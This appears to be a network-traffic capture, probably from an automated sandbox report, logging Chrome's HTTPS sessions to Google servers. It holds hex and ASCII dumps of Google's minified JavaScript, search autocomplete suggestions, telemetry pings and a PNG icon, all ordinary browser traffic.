2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 3b 74 68 69 73 2e 51 72 3d 5b 5d 3b 74 68 69 73 2e 6a 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 58 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 56 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 58 64 61 3d 66 75 6e 63 74 69 Data Ascii: ;this.Qr=[];this.jV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Xda),reject:h(this.VJ)}};e.prototype.Xda=functi
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 51 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 51 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 5a 4f 28 74 68 69 73 2e 51 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 51 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 44 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 6c 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 45 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76 65 Data Ascii: totype.G7=function(){if(this.Qr!=null){for(var h=0;h<this.Qr.length;++h)f.ZO(this.Qr[h]);this.Qr=null}};var f=new b;e.prototype.Dfa=function(h){var k=this.jF();h.ly(k.resolve,k.reject)};e.prototype.Efa=function(h,k){var l=this.jF();try{h.call(k,l.resolve
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d 7d Data Ascii: egular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}}
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 73 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 Data Ascii: his.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&sa(l,f)?l[f][this.Ga]:void 0};k.prototype.has=function(l){return c(l)&&
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 74 2c 6b 2e 65 66 2e 6e 65 78 74 2e 55 6b 3d 0a 6b 2e 65 66 2e 55 6b 2c 6b 2e 65 66 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 55 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 65 66 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 65 66 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: t,k.ef.next.Uk=k.ef.Uk,k.ef.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Uk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).ef};c.prototype.get=function(k){return(k=d(this,k).ef)&&k.value};c.prototy
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 Data Ascii: ize!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)return!1;f=e.next();return f.done\|\|f.value[0]==c\|\|f.value[0].x!=4\|\|f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6e 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 Data Ascii: 4111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e):(e-=65536,c+=String.fromCharCode(e>>>10&1023\|55296),c+=String.fromCharCode(e&1023\|56320))}return c}});na("Array.prototype.entries",function(a){return

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.16	49747	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	856	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
2024-09-26 15:55:28 UTC	1305	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:55:28 GMT Expires: Thu, 26 Sep 2024 15:55:28 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-taTF3yTc-M5JSsHgGrXUIA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:55:28 UTC	85	IN	Data Raw: 31 30 33 62 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 20 72 75 6e 6e 69 6e 67 20 62 61 63 6b 73 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a Data Ascii: 103b)]}'[[["denver broncos running backs",0,[3,357,362,396,143],{"zf":33,"zl":8,"z
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 61 67 61 74 68 61 20 61 6c 6c 20 61 6c 6f 6e 67 20 65 70 69 73 6f 64 65 20 33 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 76 69 72 61 6c 20 70 69 7a 7a 61 20 64 6f 6d 69 6e 6f 73 20 63 6f 75 70 6f 6e 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 67 65 74 74 79 73 62 75 72 67 20 63 6f 6c 6c 65 67 65 20 73 74 75 64 65 6e 74 22 2c 34 36 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 6c 6d 22 Data Ascii: p":{"gs_ss":"1"}}],["agatha all along episode 3",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["viral pizza dominos coupon",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["gettysburg college student",46,[3,357,362,396,143],{"lm"
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 42 53 6f 73 46 48 4f 2b 6d 35 74 33 41 47 4e 36 37 36 54 67 42 39 58 6d 4e 54 56 31 4c 6d 4c 6f 70 46 43 4c 67 57 58 73 4f 35 73 70 32 34 75 63 66 66 72 59 4d 6c 79 5a 4d 30 45 55 31 52 4d 36 66 39 33 56 78 6e 71 43 52 6a 64 34 7a 73 50 62 65 77 57 31 78 7a 75 63 4c 38 77 2b 6f 66 56 56 56 42 70 6b 71 30 71 6b 73 49 75 6d 65 6d 74 56 64 54 32 35 75 53 51 4c 41 58 32 75 4f 32 43 62 77 6a 62 44 63 6d 35 4b 35 33 52 78 35 5a 54 77 79 72 57 78 77 31 43 6f 4a 7a 46 47 51 65 6d 56 49 44 68 75 51 54 59 6b 44 76 63 48 65 39 67 53 36 62 4e 59 4b 66 4c 7a 61 4f 6e 69 54 33 4b 6d 6d 41 78 74 47 70 46 74 4b 79 4d 70 37 37 48 35 4a 73 63 59 5a 31 56 52 31 57 59 5a 67 46 63 77 31 46 51 53 6b 30 73 38 59 30 4a 70 33 49 47 78 4e 78 73 31 68 35 33 2b 45 71 54 31 6c 4a 43 Data Ascii: BSosFHO+m5t3AGN676TgB9XmNTV1LmLopFCLgWXsO5sp24ucffrYMlyZM0EU1RM6f93VxnqCRjd4zsPbewW1xzucL8w+ofVVVBpkq0qksIumemtVdT25uSQLAX2uO2CbwjbDcm5K53Rx5ZTwyrWxw1CoJzFGQemVIDhuQTYkDvcHe9gS6bNYKfLzaOniT3KmmAxtGpFtKyMp77H5JscYZ1VR1WYZgFcw1FQSk0s8Y0Jp3IGxNxs1h53+EqT1lJC
2024-09-26 15:55:28 UTC	1298	IN	Data Raw: 41 36 6c 4c 45 32 38 39 2f 77 41 59 6e 33 79 2f 49 48 67 45 51 2f 69 43 45 4d 57 31 64 57 49 6e 66 34 49 77 52 54 4c 6c 39 4c 48 4a 30 61 6d 73 2f 6d 45 45 6c 69 76 61 2f 59 4d 42 79 62 34 74 53 67 61 37 69 78 79 70 36 6c 52 6d 53 79 54 73 78 4e 44 42 4f 68 4e 31 6c 59 62 48 6e 33 62 39 79 4f 34 38 2f 4a 77 6e 39 50 54 54 52 79 52 74 53 71 72 79 45 76 4c 4c 47 75 6f 62 62 38 2f 6d 33 6a 42 69 2f 55 74 49 61 51 30 77 68 6b 31 4d 77 73 79 6b 48 2b 6f 37 57 76 33 76 62 7a 34 77 50 4e 6e 2b 58 79 42 41 4b 4b 4e 55 56 74 57 6e 6f 71 51 33 74 74 5a 76 66 76 35 33 37 67 59 44 4c 62 6e 52 6b 35 34 78 31 4e 4d 75 72 71 53 44 4e 4b 69 47 4b 42 43 75 67 56 50 56 63 58 65 37 49 74 69 47 35 47 78 34 2f 74 6a 37 4f 58 30 65 5a 55 30 43 4c 54 6c 31 4f 6e 33 41 32 6b 49 Data Ascii: A6lLE289/wAYn3y/IHgEQ/iCEMW1dWInf4IwRTLl9LHJ0ams/mEEliva/YMByb4tSga7ixyp6lRmSyTsxNDBOhN1lYbHn3b9yO48/Jwn9PTTRyRtSqryEvLLGuobb8/m3jBi/UtIaQ0whk1MwsykH+o7Wv3vbz4wPNn+XyBAKKNUVtWnoqQ3ttZvfv537gYDLbnRk54x1NMurqSDNKiGKBCugVPVcXe7ItiG5Gx4/tj7OX0eZU0CLTl1On3A2kI
2024-09-26 15:55:28 UTC	855	IN	Data Raw: 33 35 30 0d 0a 71 45 7a 64 59 64 41 57 59 48 55 48 46 37 71 66 74 68 7a 6a 53 30 54 63 58 63 67 32 61 6a 52 71 38 79 4f 57 6b 62 55 48 53 33 62 5a 74 74 2f 37 59 4c 68 71 41 59 4e 55 65 37 73 6c 37 46 75 39 37 48 6e 78 74 2b 52 67 46 71 4e 32 46 37 61 5a 54 76 71 41 74 71 74 38 44 48 76 34 5a 56 47 46 56 56 51 32 70 72 6f 79 6e 59 48 39 2b 33 66 38 59 56 59 59 7a 6f 6d 54 44 35 41 65 57 4d 51 36 72 7a 49 39 53 4a 71 65 51 6f 35 58 65 7a 48 61 39 2b 44 35 78 38 55 31 54 50 48 48 4b 59 68 71 73 77 75 78 4a 4a 73 42 62 62 34 33 77 73 71 55 39 4b 53 73 78 30 54 49 4e 77 33 39 52 38 43 33 6a 7a 6a 45 56 6a 43 4a 56 69 64 30 49 2f 55 50 50 33 78 59 77 6a 6a 51 36 6b 66 4a 6b 4c 6c 6a 6f 7a 2f 2f 32 51 5c 75 30 30 33 64 5c 75 30 30 33 64 22 7d 5d 2c 5b 22 6c 65 Data Ascii: 350qEzdYdAWYHUHF7qfthzjS0TcXcg2ajRq8yOWkbUHS3bZtt/7YLhqAYNUe7sl7Fu97Hnxt+RgFqN2F7aZTvqAtqt8DHv4ZVGFVVQ2proynYH9+3f8YVYYzomTD5AeWMQ6rzI9SJqeQo5XezHa9+D5x8U1TPHHKYhqswuxJJsBbb43wsqU9KSsx0TINw39R8C3jzjEVjCJVid0I/UPP3xYwjjQ6kfJkLljoz//2Q\u003d\u003d"}],["le
2024-09-26 15:55:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.16	49749	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	1430	OUT	GET /client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
2024-09-26 15:55:28 UTC	758	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-tVe7CvP1-7mJ04bi6LVMmg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:28 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.16	49751	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	775	OUT	GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
2024-09-26 15:55:28 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 2091 Date: Thu, 26 Sep 2024 15:55:28 GMT Expires: Thu, 26 Sep 2024 15:55:28 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	719	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
2024-09-26 15:55:28 UTC	1372	IN	Data Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4 Data Ascii: >C^PC%< 69,$0xM=`\MI.\|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P\|[R]m,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.16	49752	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
